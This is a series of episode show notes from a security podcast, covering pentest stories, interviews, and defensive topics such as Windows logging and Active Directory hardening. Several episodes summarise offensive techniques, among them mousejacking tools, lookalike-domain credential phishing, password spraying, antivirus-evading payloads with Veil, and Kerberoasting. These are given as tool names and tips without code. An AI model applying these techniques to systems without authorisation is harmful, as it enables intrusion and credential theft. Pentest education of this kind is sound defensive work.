    • The Digital Forensics Survival Podcast is a FANTASTIC resource to learn more about forensics

    • CyLR works great to do quick live disk artifact-gathering on a suspect system, and then...

    • CDQR can step in and analyze the info you gathered with CyLR and spit out helpful reports to begin your investigation

    • YouTube video of the CyLR/CDQR creators demonstrating the tools and doing a live demo of artifact collection/analysis

    • Did you miss this week's mousejacking Webinar? Also, DIY $500 Pentest Lab - Part 2 is up on YouTube. And we've got a fun Webinar on MITRE ATT&CK coming up in May. Sign up here


    7MS #355: Mousejacking! Mar 27, 2019

    This episode is brought to you by Netwrix Auditor, which empowers IT pros to detect, investigate and resolve critical issues before they stifle business activity, and proactively identify and mitigate misconfigurations in critical IT systems that could lead to downtime.

    In this episode, we talk about the Mousejacking attack, which allows someone with a crazy radio (or other similar device) to inject keystrokes into vulnerable keyboards and mice. Yikes!

    Not trying to be a doom and gloom guy here, but using this Mousejacking attack, pentesters/attackers could take over your entire Active Directory in just seconds - from the parking lot! I'll talk about how exactly that could be done - as well as ways to defend against mousejacking - in today's episode.

    If this episodes primes your appetite for more Mousejackin' fun, join me and my pals Paul and Dan for a deep-dive Mousejacking Webinar on Tuesday, April 2 at 12 p.m. CST!

    Some resources talked about in today's episode:

    • Mousejack.com - great demo video of the attack

    • Crazy Radio PA - one hardware option to perform mousejacking attacks

    • Custom mousejacking firmware for Crazy Radio PA

    • Jackit - tool for conducting mousejack attacks

    • A cool Twitter thread on using mousejacking for pentests

    • Vulnerable devices - nice repository of devices known to be susceptible to mousejacking attacks


    7MS #354: Tales of Internal Pentest Pwnage - Part 2 Mar 25, 2019

    Today's episode is the thrilling, exciting, heart-pounding conclusion of Tales of Internal Pentest Pwnage - Part 1. In this episode, we cover the final "wins" that got me to Domain Admin status (and beyond!):

    • Got DA but can't get to your final "crown jewels" destinations? How about going after the organization's backups (evil grin!)

    • Got DA but stuck to find hot leads to where the crown jewels are? Get snoopy and go through people's files, folders and...bookmark caches! (evil grin #2!)

    • If your nmap/eyewitness scan turns up Web sites with simply an IIS default landing page or "It works!" Apache page on it, there's probably more there than meets the eye.

    We also talk about lessons learned from this pentest - both things done well and things the org can do to make the next pentester's job a lot harder.


    7MS #353: Tales of Internal Pentest Pwnage - Part 1 Mar 22, 2019

    Buckle up! This is one of my favorite episodes.

    Today I'm kicking off a two-part series that walks you through a narrative of a recent internal pentest I worked on. I was able to get to Domain Admin status and see the "crown jewels" data, so I thought this would be a fun and informative narrative to share. Below are some highlights of topics/tools/techniques discussed:

    Building a pentest dropbox

    The timing is perfect - my pal Paul (from Project7) and Dan (from PlexTrac) have a two-part Webinar series on building your own $500 DIY Pentest Lab, but the skills learned in the Webinars translate perfectly into making a pentest dropbox. Head to our webinars page for more info.

    Securing a pentest dropbox

    What I did with my Intel NUC pentest dropbox is build a few VMs as follows:

    • Win 10 pro management box with Bitlocker drive encryption and Splashtop (not a sponsor) which I like because it offers 2FA and an additional per-machine password/PIN. I think I spent $100/year for it.

    • Kali attack box with an encrypted drive (Kali makes this easy by offering you this option when you first install the OS).

    Scoping/approaching a pentest

    From what I can gather, there are (at least) two popular schools of thought as it relates to approaching a pentest:

    • From the perimeter - where you do a lot of OSINT, phish key users, gain initial access, and then find a path to privilege from there.

    • Assume compromise - assume that eventually someone will click a phishing link and give bad guys a foothold on the network, so you have the pentester bring in a Kali box, plug it into the network, and the test begins from that point.

    Pentest narrative

    For one of the tests I worked on, here were some successes and challenges I had along the way:

    Check out the show notes at 7MS.us as there's lots more good info there!


    7MS #352: Recap of Rad Red Team Training Mar 14, 2019

    I recently had the awesome opportunity to take the awesome Real World Red Team course put on by Peter Kim, author of The Hacker Playbook series.

    TLDR and TLDR (too long don't listen): go take this training. Please. Now. The end.

    If you want to hear more, check out today's podcast episode where I talk about all the wonderful tidbits I learned from Peter during the training, including:

    • Doppelganger attacks - does your target have a frequently used site like mail.company.com? Try buying up mailcompany.com with a copy of their email portal (using Social Engineer Toolkit), and the creds might come pouring in!

    • Get potential usable creds from old breaches (Adobe, Ashley Madison, LinkedIn, Spotify)

    • Password spraying is often really effective to get you your first set of creds - check out Spray or DomainPasswordSpray

    • When creating phishing payloads, Veil will help you craft something to bypass AV

    • When you're in a network and have grabbed your first set of creds, run BloodHound or SharpHound to map the Active Directory and find your high-value targets

    • Check systems for MS17-010 for some potential easy wins

    • Look for potential accounts that you can Kerberoast

    For more info visit today's show notes on 7ms.us


    7MS #351: Turn Windows Logging up to 11 Mar 06, 2019

    Today's episode is brought to you by NoteCast. Try it free for 60 days (no credit card required) and enter code 7MS when completing your signup.

    In today's episode, I talk about how the level of Windows server/client logging out of the box is...not really awesome. I then look at how we can create a GPO that turns logging "up to 11" using some free tools and cheat sheets.

    If you want to simulate this in your own lab by building out an Active Directory environment, check out part 1 of a Webinar series we've been working on called DIY $500 Pentest Lab, which helps you select hardware/software components you need to build a lab. Then coming up soon is part 2 where we'll build out a Windows 2012 server, promote it to a DC, join a couple clients to it, and prepare to start hacking!

    Once your AD and clients are setup, you can start slurping up their logs for free using a Papertrailapp account (not a sponsor). I went ahead and paid for a $7/mo plan so I could get 1GB of storage and a little longer log retention.

    Then, I used LOG-MD to audit a Windows workstation and get some great recommendations on what registry settings and security policy tweaks to make. Finally, I started turning this into a GPO so I could begin pushing out these settings en masse. My living/breathing document to capture all this information is in a new gist that I plopped here.


    7MS #350: Interview with Lewie Wilkinson of Pondurance Feb 20, 2019

    Today's featured interview is with Lewie Wilkinson, senior integration engineer at Pondurance. Pondurance helps customers improve their security posture by providing a managed threat hunting and response solution, including a 24/7 SOC. Lewie joined me via Skype to talk a lot about a topic I'm fascinated with: incident response! I had a slew of questions and topics I wanted to discuss, including:

    • Fundamentals of threat hunting

      • What is threat hunting?
      • What are the fundamentals to start mastering?
      • How can someone start developing the core skills to get good at it?
    • How can sysadmins/network admin, who have a busy enough time already just keeping the digital lights on, handle the mounting pressure to also shoulder security responsibilities as part of their job duties?

    • What training/cert options are good to build skills in threat hunting?

    • Lets say you know one of your users has clicked something icky and you suspect compromised machine/creds. You pull the machine off the network and rebuild it. How do you know that you've found/limited the extent of the damage?

    • Are attackers on networks typically wiping logs on systems as the bounce around laterally?

    • Anything to add to the low-hanging hacker fruit list?

    • Why is it so critical to not just have logs, but have verbose logs with rich data you need in an investigation?

    • When does it make sense to outsource some security responsibilities to a third party?

    Learn more about Pondurance at their Web site and Twitter.


    7MS #349: Interview with Ameesh Divatia of Baffle Feb 14, 2019

    Today's featured interview is with Ameesh Divatia, cofounder and CEO at Baffle. Baffle offers an interesting approach to data protection that they call data-centric protection, and the idea is you need to protect information at the record level, not just the sort of traditional approach of "encrypt at rest" and call it good.

    Ameesh sat down with me to talk about a lot of high level data and security privacy concerns, specifically:

    • Data privacy - it seems like every 15 minutes there's yet another massive data breach. Why is this continuing to happen?
    • What are the basic security/privacy fundamentals that companies should be doing but, for whatever reason, are not?
    • GDPR
      • What does GDPR mean to the average person?
      • Why it was a data privacy wake-up call for so many?
      • Have there been any sizable fines issued thus far?
    • How can data that companies collect on us be processed in a way that doesn't compromise security?

    Learn more about Baffle at their Web site and Twitter.


    7MS #348: Cell Phone Security for Tweenagers Feb 06, 2019

    Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    This episode focuses on security for families/kids - specifically cell phone security for tweenagers. We hit a milestone in the 7MS household this year because my tweenage son got an iPhone, much to my...uhh...not excitement. So we decided to wrap the following technical and administrative controls around the phone to hopefully make it a pleasant experience for everybody:

    Technical
    • I really dig the Apple family sharing controls, which let you do things like:

      • Have the phone "sleep" at certain hours
      • Limit the total amount of screen time per day
      • Require you to authorize any apps that are downloaded
    • We turned on OpenDNS to help filter inappropriate content.

    • I also use UniFi access points, which allow you to create a separate wireless SSID with a voucher system enabled on it. That way, you can hand out vouchers to kids with a defined amount of access attached to it (like 1 hour or whatever you like). We use it as a reward once the kids' chores and homework is complete.

    Administrative

    For our tweenager with the phone, we wrote up an agreement about acceptable use of the phone - including guidelines around the device's physical security, passwords and PINs, appropriate content, etc. You can grab a copy here


    7MS #347: Happy 5th Birthday to 7MS Jan 31, 2019

    Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Psst...my pals Paul and Dan are hosting a Webinar all about building your own pentest lab for ~$500. This is happening next Tuesday, Feb. 5 at 12 p.m. CST. Sign up here.

    Today I thought I'd kind of hit the reset/refresh button and give you a little background on:

    • My self-diagnosed job ADHD (check out my series on career guidance for the even longer version :-/)
    • The history of 7MS the podcast (inspired by 10 minute podcast)
    • How the podcast helped launch 7MS the business
    • The various resources 7MS has worked on to help you in your IT/security career, such as:
      • BPATTY - Brian's Pentesting and Technical Tips for You
      • A Slack channel full of cool security people who want to help you learn, and learn from others as well
      • Vulnerable VMs to help you practice hacking, such as Billy Madison and Tommy Boy

    Thinking about starting your own company? Come see me at Secure360 this summer for my talk called So You Want to Start a Security Company.


    7MS #346: Baby's First Red Team Engagement Jan 24, 2019

    WARNING: Today's episode is a bit of an experiment, and I hope you'll hang in there with me for it.

    I had the opportunity to do a week-long red team engagement, and so I recorded a little summary of the experience at the end of each day, and then pasted them all together to make today's episode.

    Listening back to the episode now, it sounds like I might belong on a funny farm. But I thought it would be fun to give you a first-hand account of the experience so you can share the stomach-twisting journey with me.


    7MS #345: Interview with Amber Boone Jan 16, 2019

    Coming up on Tuesday, January 22 I'll be doing a Webinar with Netwrix called 4 Ways Your Organization Can Be Hacked. It features a Billy Madison theme and pits evil Eric Gordon against sysadmin Billy Madison. Hope you'll join us - it'll be fun!

    Today I'm pleased to welcome Amber Boone to the program! She is an awareness builder for a cybersecurity vendor (insert dramatic music!), and Amber was gracious enough to help me pilot a new style of interview called 7 Minute Interviews with 7MS.

    I basically asked Amber a "serious" question about security, then a goofy one, then another serious, then another goofy...and so on and so forth until the 7 minutes was up.

    Amber answered important questions such as:

    • Would she rather fight 100 duck-sized horses, or 1 horse-sized ducks?

    • What basic security effort could orgs address without investing a huge amount of dollars and effort?

    • Would she rather be a giant hamster or a tiny rhinoceros?

    If you'd like to check out what Amber's doing online, check out her LinkedIn, her side project YourLegacies.com or follow Amber on Twitter.

    Interested in doing a 7 minute interview with 7MS? Head here.


    7MS #344: Announcing the 7MS User Group Jan 09, 2019

    I'd like to coordially invite you to the first-ever 7MS User Group meeting, coming up Monday, January 14th at 6 p.m.! You can attend physically, virtually or both! All the info you need is in today's podcast, as well as here. See you there!


    7MS #343: Interview with Dan DeCloss Jan 02, 2019

    Psssst! Wanna come to the first ever 7MS User Group meeting? It's coming up on January 14th. You can join in person or virtually! Head here for more information!

    Dan DeCloss (a.k.a. wh33lhouse on Slack and @PlexTracFTW aon Twitter) joined me virtually in the studio to talk about his passion project, PlexTrac. Dan also shared his insight on all sorts of great topics, including:

    • How to bleed "purple" and get comfortable playing on both the attacking and defending side of the house

    • What areas are we failing in defending our networks - and what kind of things can we do make our networks more resilient?!

    • What's the biggest challenge you see on both the blue and red team side (spoiler alert: communication is super important!)?

    • How do you break into a cyber security position that requires X years of experience when you have zero experience (Dan offers a great tip: don't be intimidated by requirements on job postings...they're often excessive/unreasonable)

    • Ways to show security aptitude on your resume without necessarily having a bunch of experience:

      • Build a home lab
      • Create a blog
      • Bug bounties
      • Make a podcast
      • Get certs (or at least get enrolled in them)
    • Some history on PlexTrac and what inspired Dan to create it


    7MS #342: Interview with Matt McCullough Dec 27, 2018

    Matt McCullough (a.k.a. Matty McFly on Slack) joined me in the studio to talk about his wild and crazy path to security. He started literally with no technical experience, but through a lot of hard work, aggressive networking and taking advantage of educational and career opportunities, Matt now rocks a SOC job. Matt and I sat down to talk about a lot of good stuff:

    • How to start an IT career as "the family IT guy"

    • Leveraging a higher education (at places like Lake Superior College to meet people of influence and start networking like a beast

    • Entry level sysadmin and helpdesk jobs are fun - great opportunities to make the most of the position, build your skills and stretch yourself outside your comfort zone

    • MSPs (Managed Service Providers) are another great way to see different clients/verticals/systems and the various requirements that go into supporting them. From there, look for opportunities to start securing those organizations, as many MSPs don't dabble heavily into the security realm.

    • If you're going to school for cybersecurity training, look for ways to leverage your status to get discounts on security training, such as with SANS

    • Competitions like CCDC are awesome. You're given a handful of servers that are full of vulnerabilities, and you essentially are tasked with defending a network against a professional group of pentesters/redteamers. You even have to deal with real-life "injections" (other random emergencies and mock customers to deal with) while you're in the thick of the battle!

    • Join local cyber clubs (or start your own)! Looking for a fun CTF to get started in a group setting? Try hacking the OWASP Juice Shop

    • Attend security conferences(or start your own)!

    ...more notes at 7MS.us!


    7MS #341: How to Fix Unquoted Service Paths Dec 19, 2018

    Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    In today's episode we talk about how to identify - and resolve - unquoted service paths. Maybe you've seen this pop up in your vulnerability scanner and aren't quite sure what the risk is or how to fix it - and maybe more importantly, how to fix it at scale if need be. That's the technical conundrum I faced this week, so I talk about some resources to help you identify this risk and get it out of your environment!

    And here's a gist I wrote that walks you through everything step by step:


    7MS #340: Forensics 101 Reloaded and The CryptoLocker Music Video Dec 13, 2018

    Last week I had the fun privilege of speaking twice at the Minnesota Goverment IT Symposium on the following topics:

    • Forensics 101: This was a "reloaded" talk that I started earlier this year (and covered in episode 299 and 300). At a high level, the talk covered:

      • Hunting malware with Sysinternals
      • Creating system images with FTKImager
      • Dumping memory with Volatility and ripping icky stuff out of memory images with their 1-2-3 punch article
      • Seeking out DNS tunneling/exfil using Security Onion
    • Pecha Kucha: this talk, which is in a 20x20 format is part PSA about how to not click bad links, part cautionary tale (and music video!) about how the promise of a free burrito can ruin your business! Check out the video here, and special thanks to Joe Klein for providing the awesome pics to go along with the storyboard - you're a champ.

    Also, check out the Digital Forensics Survival Podcast which is awesome for learning more about forensics and IR.


    7MS #339: A Pulse-Pounding Impromptu Physical Pentest Dec 06, 2018

    On a recent security assessment I was thrown for a loop and given the opportunity to do a two-part physical pentest/SE exercise - with about 5 minutes notice(!). Yes, it had me pooping my pants, but in retrospect it was an amazing experience. This is the mission I was given:

    • See if you can get the front desk staff to plug in a USB drive - I posed as John Strand and armed myself with a fake resume. And as I approached the front desk I suddenly panicked and thought, "What if the front desk person is a BHIS fan?!?!?"

    • Break into a door with weak security and steal equipment - I was given a plastic shiv and asked to try and get into a secure area in the middle of a busy office morning. No pressure, right?

    Was I successful? Was I arrested? Find out in today's episode!


    7MS #338: SIEMple Tests for Your SIEM Solution Nov 28, 2018

    Today's episode talks about some SIEMple tests you can run on your SIEM (OMg see what I did there? I took the word simple and made it SIEMple. Genius stuff, right? And there's no extra charge for it!). And if you're just now starting to shop around for a SIEM, this episode also has an extensive questionnaire you can use to put your vendors' feet to the fire and see what they're made of! Along with today's episode, I'm releasing a companion gist that contains:

    • Questionnaire - a series of questions you can ask SIEM vendors to gather as many data points about their products and services as possible

    • SIEM tests - a few tests you can conduct on your internal/external network to see if your SIEM solution indeed coughs up alerts

    Enjoy!


    7MS #337: Happy Secure Thanksgiving Nov 21, 2018

    Happy Thanksgiving! In this episode I:

    • Share some things I'm thankful for - like you!
    • Talk about a fun episode I'm working on that has some SIEMple tests you can use to test your SIEM (omg see what I did there? So clever)
    • Announce the 7MS user's group that will start meeting in the south metro area of Minnesota in January of 2019!
    • Tell you a story about a kid that peed his pants in front of me (you're welcome in advance)

    Hope you can take some time off and enjoy your friends/family this week and weekend. Have a blessed Thanksgiving!


    7MS #336: How to Succeed in Business Without Really Crying - Part 6 Nov 14, 2018

    Welcome to part 6 of our miniseries all about the ups, downs, trials and tribulations of being a small, one-person security start up. In this episode I detail out all the software/services I use to run 7 Minute Security, LLC in hopes it might help you run your company as well! I started a new gist to complement this episode, which you can get by clicking here. Enjoy!


    7MS #335: Cool Stuff I Just Learned From Red Teamers Nov 08, 2018

    Today I'm excited to brain-dump a bunch of cool stuff I learned at a red team conference called ArcticCon this week. Although this conference observes the Chatham house rule I'm just going to talk about a few things from a general, high level. Specifically, I asked several heavy-hitting red teams these burning questions:

    • When you red team an org, do you usually assume compromise (i.e. plug a Kali box into the network and go from there) or are you crafting email payloads from scratch, trying to get a reverse shell past various email/firewall filtering efforts?

    • Does your management seem to "get it" when it comes to the true value of having a red team? Or do they put limits on your efforts - like "Wait a sec, don't phish my boss!" Or "OMG hold on, don't pwn those systems!"


    7MS #334: IT Security Horrors That Keep You Up at Night Nov 01, 2018

    This week I got to celebrate Halloween with my friends at Netwrix by co-hosting a Webinar called IT Security Horrors That Keep You Up at Night. The content was a modified version of the Blue Team on a Budget talk I've been doing the past year or so, and essentially focuses on things organizations can do to better defend their networks without draining their budgets.

    The presentation had a Child's Play theme and showed Chucky trying to hack Andy's company via:

    • Phishing
    • Abusing bad domain passwords
    • Abusing bad local admin passwords
    • Responder attack
    • Lack of SMB signing

    Each attack was also followed up my some advice for how to stop it (or at least slow down its effectiveness).

    The presentation itself was a blast and I learned some good public speaking lessons as a result:

    • Get your slides done early! - when co-presenting, it makes sense that they want to see your slides sooner than the day of! :-)

    • Don't freak out about an audience of "none" - I always think Webinars are weird because you can't see people's faces or interpret their body language to get a feel for whether they appreciate your humor or understand the points you're trying to make. I learned you just gotta keep pushing forward "blind" whether you like it or not.

    • Setup a redundant presentation system - ok so file this one with the irrational fears dept, but I actually had a second laptop ready with my presentation loaded, and the laptop was connected to a cell hotspot I setup on a tablet. That way if my machine BSOD'd or Internet went out in my house, I could quickly rejoin the presentation and pick up where I left off. Safe or psycho? You decide!

    Happy belated Halloween!


    7MS #333: Pentesting Potatoes Oct 26, 2018

    This week I was in lovely Boise, Idaho doing some security assessment work. While I was there I got to hang out with Paul Wilch and some of the Project7 crew and picked up a lot of cool tools and tips I share in today's episode:

    • The Badger Infosec group did a cool Rubber Ducky demo.

    • Dan from DDSec did a demo of PlexTrac which is "the last cybersecurity reporting tool you will ever need." I'm actually going to use PlexTrac for my next few assessments and am working to line up a future interview with Dan to learn even more.

    • Paul gave a demo of Parrot which is cool and Kali-like. However, when Paul and I did a side-by-side test with Kali, we noticed that Parrot kind of barfed when it set out to do an Eyewitness report.

    • After meeting Paul's son, Simon, I'm optimistic about the future IT/security leaders in this country. There are some wicked-smart youth out there!

    • Paul gave me a hotel keycard lockpick/shiv (his own creation!) and staged a few doors for me to try and bypass. He made it interesting when he promised to throat-punch me if I failed! Thankfully, I got off without any throat punches!


    7MS #332: Low Hanging Hacker Fruit Oct 17, 2018

    In this episode I'm releasing a new document aimed to help organizations eliminate low hanging hacker fruit from the environment. The document contains (relatively) cheap and (relatively) easy things to implement. And my hope is it can be a living/breathing document that will bulk up over time. Got things to add to this list? Then please comment on the gist below!


    7MS #331: How to Become a Packtpub Author - Part 3 Oct 10, 2018

    It's done! It's done!! It's DONE!!!

    That's right mom, my PacktPub course called Mastering Kali Linux Network Scanning is done!

    In today's episode I:

    • Recap the course authoring experience

    • Explain my super anal retentive editing process that takes 4 hours for every 10 minutes of produced video

    • Admit some last minute mistakes that about made me quit the whole project

    With the holidays coming up, this course is a perfect gift for that IT or security person in your life :-). Buy them a copy - or 10!

    Psst! I will soon be getting a handful of vouchers to the course that I can give away to podcast listeners. Interested in one? Ping me and I'll draw names from a virtual hat in a few weeks!


    7MS #330: Interview with Nathan Hunstad of Code42 Oct 03, 2018

    In today's episode, I'm excited to be joined in the studio by Nathan Hunstad, Director of Security at Code42. Nathan and I had a great chat about Code42's new security offering called Code42 Forensic File Search, which helps IT and security teams figure out where files are located across their enterprise - even if the endpoints are offline. This functionality lends itself to a number of interesting use cases and helps answer questions such as:

    • "Does known malware have, or has it ever had, a foothold in our environment?"

    • "Has a particular crypto-mining agent been installed on our employees’ computers? Who has it now?"

    • "What endpoints have or had copies of our company’s most sensitive files?"

    • "What files did an employee download or delete in the months before resigning?"

    • "What non-sanctioned collaboration applications are present in our environment?"

    After today's podcast, be sure to check out this great video of Nathan demonstrating the power of Code42 Forensic File Search live!

    Also talked about in today's episode:

    • Implementing host-based firewalls - here's a great blog and video on it

    I want to thank Code42 for their support of the 7 Minute Security podcast. It's a pleasure to work together with them to help companies be more secure!


    7MS #329: Active Directory Security 101 Sep 27, 2018

    Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what’s happening both on your local network and cloud-based IT systems and tells you about critical changes, and when and where people have been accessing data. Give it a spin right in your browser here, and then try it in your environment free for 20 days! www.netwrix.com

    Welcome! Today I'm kicking off a new miniseries all about the fundamentals of Active Directory security. Rather than try to pile all the info into show notes, I'm going to start pumping everything into a living/breathing GitHub gist so we're all on the same page as this miniseries develops further. So, please feel free to check out that gist here.


    7MS #328: How to Succeed in Business Without Really Crying - Part 5 Sep 19, 2018

    This episode is a cavalcade of fun! Why?

    First, I've got a big announcement: I've accepted a new position.

    "What?!" exclaimed my mom. "I thought you were president of 7MS, what the what?"

    No worries, it's business as usual, and my responsibilities at 7MS aren't changing. But I'm also going to start writing blogs, nurturing a Slack channel and producing a podcast for somebody else each week. Tune in to find out who!

    Oh, and I also conclude this episode with a song from my band, Sweet Surrender. A few years ago we wrote a goofy song to start our shows called Sound Check, and in this episode, I wanted to debut the sequel to that song...called MANDATORY ENCORE. Enjoy.


    7MS #327: Interview with John Strand Sep 13, 2018

    Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what’s happening both on your local network and cloud-based IT systems and tells you about critical changes, and when and where people have been accessing data. Give it a spin right in your browser here, and then try it in your environment free for 20 days! www.netwrix.com

    Well I'm geeking out big time because today I chatted with John Strand of Black Hills Information Security, SANS instructing, Security Weekly, Active Countermeasures, RITA and more. Some people think he looks like Wash from Serenity or Steve the Pirate from Dodgeball, and others get upset when they learn he's not John Strand the male model.

    I've followed John and his team's work since I got started in security, and they've been a huge inspiration for what I do at 7MS. If you're not watching the BHIS Webcasts stop what you're doing and subscribe now! They're all full of practical, hands-on security advice - often complemented by tools that are totally free!

    Anyway, enjoy today's interview where John and I talk about how to make pentesters' jobs harder, and why he'd rather be a security advisor to Katy Perry than Donald Trump.


    7MS #326: Interview with Ryan Manship and Dave Dobrotka Sep 06, 2018

    Today's episode is brought to you by my friends at Dashlane, a fantastic password manager for you, your family and your business! Head to www.dashlane.com/7ms and use the code 7MS for 10% off a year of Dashlane Premium!

    Today I'm super pumped to be joined by Ryan Manship of RedTeam Security and Dave Dobrotka of United HealthGroup. Both these guys lead red teams for a living and had a lot of great insight to share as it relates to:

    • The definition of "red teaming" and where it overlaps, if at all, with pentesting
    • Successfully running red team campaigns
    • Defending against a red team campaign
    • How to climb unclimbable walls
    • Is antivirus any good at stopping attackers?
    • The importance of 2FA and training your end-users
    • How to fool the "This email originated outside your organization" email banners
    • How to break into red teaming as a career
    • How to successfully break into a casino (or not)

    Other links and things mentioned in today's show:

    • RedTeam Security's awesome YouTube video on breaking into the US power grid

    • If you're a red teamer and in the Twin Cities area (or willing to drive a bit), you definitely want to sign up for ArcticCon coming up on October 23-24 at the Optum World Headquarters. Head to the link and sign up - if there are seats left!

    Once you listen to today's episode, please let me know if you'd like Ryan and Dave to come back for another interview. We were thinking it would be a blast to talk about the details of planning a red team engagement!


    7MS #325: Integrating Pwned Passwords with Active Directory - Part 2 Aug 30, 2018

    Today's episode is a follow-up to #304 where we talked about how you can integrate over 500 million weak/breached/leaked passwords form Troy Hunt's Pwned Passwords into your Active Directory.

    To get started with this in your environment, grab Troy's updated passwords list here, and then you can check out my BPATTY site for step-by-step implementation instructions.

    The big "gotchas" I discuss in today's episode are:

    • If users update their password to something on the Pwned Passwords list, they'll see the generic "Your password didn't meet policy requirements" message. In other words, the message they'll see is no different than when they pick a password that doesn't meet the default domain policy. So be careful! I'd recommend training the users ahead of pulling the trigger on Pwned Passwords.

    • If you want to take, for example, just the top 100 words off of Troy's list and start your implementation off with a small list with:

    Get-Content ".\pwnedpasswords.txt" | select -First 100
    • As it relates to "hard coding" a machine to point to a specific domain controller, this site has the technique I used. Is there a better way?

    7MS #324: How to Succeed in Business Without Really Crying - Part 4 Aug 23, 2018

    It's been a while so I thought I'd update you on how things are going on the business front. Here are the big updates I want to share with you in today's episode:

    • A new 7MS hire that's going to hunt sales opportunities!
    • My approach to finding podcast sponsors (it seems to be working)
    • Some kick-butt interviews that are on the horizon (including the one and only JOHN STRAND!)

    Lots of goodies to share today!


    7MS #323: 7 Ways to Not Get Hacked Aug 16, 2018

    I'm putting together a general security awareness session aimed at helping individuals and businesses not get hacked. To play off the lucky number 7, I'm trying to broil this list down to 7 key things to focus on. Here's my list thus far:

    1. Passwords
    2. 2FA/MFA
    3. Wifi (put a good password on it, don't use WEP, don't use WPS
    4. Sign up for HaveIBeenPwned
    5. Update all the things
    6. Block malware/mining with browser plugins
    7. Security awareness training

    What do you think? Anything I missed or should consider swapping with another topic? Contact me!


    7MS #322: My First Live Radio Interview Aug 09, 2018

    I had an exhilarating and terrifying experience this week doing my first ever live radio interview!

    As a quick bit of background, this interview was part of the 7MS radio marketing campaign that I've talked about my "How to Succeed in Business Without Really Crying" series (here's part 1, 2 and 3).

    The interview was conducted by Lee Michaels, and though my heart was pounding for the first few minutes, it quickly became fun as Lee and I talked about picking good passwords, securing wifi, talking to your kids about safe online behaviors, and more.


    7MS #321: Interview with Joe Klein - Part 2 Aug 01, 2018

    Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

    Today's episode is a follow-up interview with Joe Klein, who is my good pal, a former coworker, and a SOC analyst extraordinaire. You might remember Joe from things such as...this podcast - episode #290 to be exact.

    When we last left Joe, he had just started an exciting new journey as a SOC analyst, and also picked up a new sweet gig teaching college-level security courses. So Joe and I sat down last week in the 7 Minute Security studios to talk with Joe about:

    • How to be an absolute beast at networking
    • Seizing new opportunities (even if it seems scary)
    • Good certs for security newbs (and not-so-newbs) to pursue
    • Life as a SOC analyst
    • How to learn security by teaching it!

    This interview was an absolute blast to work on with Joe, and after it was over, neither of us could believe that the run time was nearly 2 hours! So in order to help you navigate the episode and have the best listening experience possible, we created the following "Choose Your Own Adventure" timeline with the high (and low?) discussion points of the interview. Enjoy!

    (Interview timeline available on 7MS under episode #321)


    7MS #320: Interview with Lane Roush of Arctic Wolf Jul 25, 2018

    Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

    This week I sat down with Lane Roush of Arctic Wolf to discuss the big hairy beast that is...(insert dramatic music here) logging and alerting! I work with a lot of clients (and you probably do too) who want answers to these questions:

    • What in the world is going on in my network?
    • How will I know if bad stuff is happening?
    • If I do identify the bad stuff and attempt to eradicate it, how will I know if I've exorcised all the demons?

    So Lane and I sat down to discuss this conundrum, and explore answers to other burning questions like:

    • Why is it so hard to separate the signal from noise when trying to figure out what's happening in the bowels of your network?
    • Should logging/alerting be a full-time job for one or more people?
    • When does it make sense to outsource these responsibilities?

    Check out today's interview to learn more, and also reach out to Arctic Wolf on their Twitter or LinkedIn for more information.


    7MS #319: Sniper and Firewalls Full of FUD Jul 20, 2018

    Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

    In today's episode, I talk about my fun experience using the Sn1per automated pentesting tool. It's really cool! It can scan your network, find vulnerabilities and exploit them - all in one swoop! It also does a nice one-two punch of OSINT+recon if you feed it a domain name.

    And, I tell a painful story about how a single checkbox setting in a firewall cost me a lot of hours and tears. You can LOL at me, learn from my pain, and we'll all be better for it.


    7MS #318: Interview with Bjorn Kimminich of OWASP Juice Shop Jul 11, 2018

    Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.

    This week's show is another interview episode - this time with my pal Bjorn Kimminich of the OWASP Juice Shop.

    If you've never heard of the Juice Shop before, it's the world's most secure (and I mean that sarcastically) online shopping experience. Actually, it's chock full of security issues, which makes it a fantastic learning tool for Web app pentesters, be they seasoned or total newbs. Bjorn and I sat down (over Skype) to discuss:

    • How the Juice Shop came to be
    • The current status of application security (is it getting any better?!)
    • Common vulnerabilities still found in today's Web apps
    • Juice Shop being featured in Google's Summer of Code
    • How dev teams can better bake security into their products
    • What's next for the Juice Shop (hint: stay tuned after the episode is over for a hint on one new "feature")

    Bjorn has gone to great lengths to provide documentation about how to get up and running with a copy of the Juice Shop to begin your hacking. Personally I find it dead simple to follow Bjorn's instructions for spinning up a Docker container:

    docker pull bkimminich/juice-shop docker run --rm -p 3000:3000 bkimminich/juice-shop

    Should you find the Juice Shop to be a valuable tool, please be sure to ping Bjorn on Twitter to let him know.

    Be sure to follow the Juice Shop on Twitter as well. Psst...this account sometimes tweets coupon codes which can help you unlock certain challenges!


    7MS #317: Interview with Justin McCarthy of StrongDM Jul 05, 2018

    Today's interview features Justin McCarthy, CTO and cofounder of StrongDM, which offers both commercial and open source tools (like Comply) to help customers with SOC compliance.

    Justin schooled me (in a nice way) about a lot of things, including:

    • What SOC and the various SOC types are all about
    • What SOC compliance costs
    • What to look for in selecting a good auditor
